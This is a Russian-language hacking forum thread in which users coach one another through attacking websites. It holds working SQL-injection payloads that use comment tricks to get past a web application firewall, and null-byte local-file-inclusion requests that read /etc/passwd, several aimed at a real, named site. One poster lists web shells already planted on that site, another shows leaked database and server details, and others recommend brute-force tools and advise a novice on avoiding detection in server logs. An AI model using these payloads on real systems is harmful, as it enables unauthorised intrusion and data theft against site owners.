Ваши вопросы по уязвимостям.

тут маленькая поправочку про коментирую, правильно не table_schema , а information_schema
дальше, вот что говорит один из справочников:
цитата:
В MySQL версии 5.0 и выше есть база INFORMATION_SCHEMA. Это виртуальная база (не хранится в виде файлов, а формируется во время запуска сервера), содержащая метаданные баз данных, т.е. информацию о структуре баз данных. Доступна только для чтения.
полностью о information_schema сможешь прочитать здесь:

а об альтернативе запроса тебе уже постом выше привели пример:

и еще, дополнительно, mysql 4<=4.9 надо брутить так как иначе информацию больше не вытощить, по крайней мере о пабликах таких не вкурсе...
для брута могу порекомендовать две проги которые проверены на практике:
toolza1.0
sqliHelper 2.7

 

0x3a3a3a = :::
0x3a = :
Это не синтаксическая ошибка.

 

winstrool
Ты только вчера спрашивал как вывести список таблиц в 4ой версии,а сейчас уже отвечаешь на вопросы людей?

1. 0x3a3a3a - это синтаксическая ошибка? Открой свой любимый манул на MySQL и прочитай про эту ф-цию. Первым аргументом она приминает разделитель, можно написать concat_ws(':',a,b,c), но вариант не 100% т.к. много где используется magic_quotes, а 0x3a это : в кодировке HEX. Ты можешь туда что угодно написать, любой сделать разделитель.

2. К чему твоя "поправочка"? Человек все правильно выводит из таблицы information_schema при условии что table_schema (БД в которой находится таблица)=нужной ему.

 

Sql Injection

Такой вопрос.

Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,database%28%29%29,3,4,5,6,7,8

у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?

 

Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)

 

Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.

Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
А на счет безопасности тебе в соответствующий раздел читать статьи.

 

Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю: Method Not Implemented. GET to /index.php not supported.

В чем подвох? Как-то хитро настроено серверное ПО?

 

На сервере стоит Mod Security, который не позволяет выполнять твои запросы.

 

ta-kyn

линк сюда скинь

 

Прошу:
http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00

 

Он на нулл-байт так реагирует, а не на "../"

 

Там. три залитых шелла:

» http://www.libertarias.com/.htaccess HTTP 403 Forbidden
» http://www.libertarias.com/.htconfig HTTP 403 Forbidden
» http://www.libertarias.com/.htpasswd HTTP 403 Forbidden
» http://www.libertarias.com/.htaccess.1 HTTP 403 Forbidden
» http://www.libertarias.com/css/ HTTP 200 OK
» http://www.libertarias.com/img/ HTTP 200 OK
» http://www.libertarias.com/js/ HTTP 200 OK
» http://www.libertarias.com/stats/ HTTP 401 Authorization Required
» http://www.libertarias.com/temp/ HTTP 200 OK
» http://www.libertarias.com/c99.php HTTP 503 Service Unavailable
» http://www.libertarias.com/favicon.ico HTTP 200 OK
» http://www.libertarias.com/index.php HTTP 200 OK
» http://www.libertarias.com/r57.php HTTP 503 Service Unavailable
» http://www.libertarias.com/shell.php HTTP 503 Service Unavailable

 

чё ж ты не заюзал эти шеллы, раз там они есть?)

это банальный случай, на сервере ids или аналог.

 

Если сервер грамотно настроен, то попадают

 

Попробуй сам заюзать:

http://www.libertarias.com/index.php?menu=3&op=5&autor=-110')+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6+--+

5.1.39-log:libertarias:[email protected]c-linux-gnu

 

прошу
http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0

 

=). Благодарю. А почему ..../../etc//passwd%00... ?

 

Спасибо что активно помогаешь новичкам в вопросах. Прочитал про WAF, честно говоря первый раз слышу. Ну я решил ввести весь запрос в комментарии. Вышло так: -1+union+/*!select+1,version(),3,4,5,6,7,8*/ Все работает. При таком запросе: -1+union+/*!select+1,table_name,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES+limit+1,1*/ Он не выводит названия таблиц (лимит менял на разные). Даже 2 дня назад когда (даже не знав о WAF) комментировал запрос table_name и запрос проходил без ошибок, то он все равно не выдавал названия таблиц. Подскажи куда копать дальше.

 

просто потому, что /etc/passwd и еще часть файлов фильтруется, а другие можно и с одним слешем читать

 

Где можно скачать toolz'у, уде скомпиленную?!